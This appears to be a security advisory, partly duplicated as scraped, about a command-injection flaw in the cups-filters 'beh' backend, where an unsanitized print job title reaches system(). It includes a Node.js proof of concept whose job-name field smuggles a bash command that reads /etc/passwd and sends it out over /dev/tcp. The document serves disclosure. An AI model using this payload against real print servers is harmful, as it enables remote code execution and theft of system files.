Summary
If you use beh to create an accessible network printer, this security vulnerability can cause remote code execution.
Details
|
retval = system(cmdline) >> 8; |
// (context: argv = beh <job-id> <user> <title> <copies> <options> [file])
snprintf(cmdline, sizeof(cmdline),
"%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
cups_serverbin, scheme, argv[1], argv[2], argv[3],
...
(argc == 6 ? "1" : argv[4]),
argv[5], filename);
...
retval = system(cmdline) >> 8;The system function will be called here to execute the command, and the user and title parameters are user-controlled and unsanitized .
PoC
-
start a beh service lpadmin -p myprinter -E -v beh:/1/3/5/socket://printer:9100
-
exploit: // https://github.com/williamkapke/ipp
var ipp = require('ipp');
var PDFDocument = require('pdfkit');
var concat = require("concat-stream");
var doc = new PDFDocument({margin:0});
doc.text("1.pdf", 0, 0);
doc.pipe(concat(function (data) {
var printer = ipp.Printer("http://127.0.0.1:6310/printers/myprinter");
var msg = {
"operation-attributes-tag": {
"requesting-user-name": "Bumblebee",
"job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd > ${PWD}dev${PWD}tcp${PWD}127.0.0.1${PWD}1337\";'' #.pdf",
"document-format": "application/pdf"
},
"job-attributes-tag":{
"media-col": {
"media-source": "tray-2"
}
}
, data: data
};
printer.execute("Print-Job", msg, function(err, res){
console.log(err);
console.log(res);
});
}));
doc.end();Credits
Swing from Chaitin Security Research Lab
WinMin Reporter
Summary
If you use beh to create an accessible network printer, this security vulnerability can cause remote code execution.
Details
cups-filters/backend/beh.c
Line 288 in 5c9498a
The system function will be called here to execute the command, and the
userandtitleparameters are user-controlled and unsanitized .PoC
start a beh service
lpadmin -p myprinter -E -v beh:/1/3/5/socket://printer:9100exploit: // https://github.com/williamkapke/ipp
Credits
Swing from Chaitin Security Research Lab